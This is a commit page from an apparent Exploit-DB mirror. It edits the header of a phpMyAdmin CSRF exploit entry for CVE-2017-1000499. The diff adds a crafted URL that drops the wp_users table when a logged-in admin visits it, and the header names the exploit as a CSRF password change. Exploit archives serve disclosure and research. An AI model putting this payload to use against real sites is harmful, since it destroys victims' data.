bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2018-11-04

Browse source 
1 changes to exploits/shellcodes
This commit is contained in:
Offensive Security 2018-11-04 05:01:46 +00:00
parent b786988389
commit 0f49f84ff4
1 changed files with 6 additions and 1 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

7
exploits/php/webapps/45284.txt
View file

@ -5,7 +5,12 @@
# Software Link: https://www.phpmyadmin.net/downloads/
# Version: Versions 4.7.x (prior to 4.7.7)
# Tested on: php7 mysql5
# CVE: CVE-2017-1000499
# CVE: CVE-2017-1000499 -- Original Exploit Author: Ashutosh Barot
# Original Exploit Author: Ashutosh Barot ( www.twitter.com/ashu_barot)
# If victim DB Admin has active session with PhPMyAdmin < 4.7.7, Hitting this URL will result into DROP_TABLE,
https://example.com/phpMyAdmin/sql.php?db=DATABASE_NAME&goto=db_structure.php&table=wp_users&reload=1&purge=1&sql_query=DROP+TABLE+%60wp_users%60&message_to_show=Table+wp_users+has+been+dropped
# Exploit CSRF - Modifying the password of current user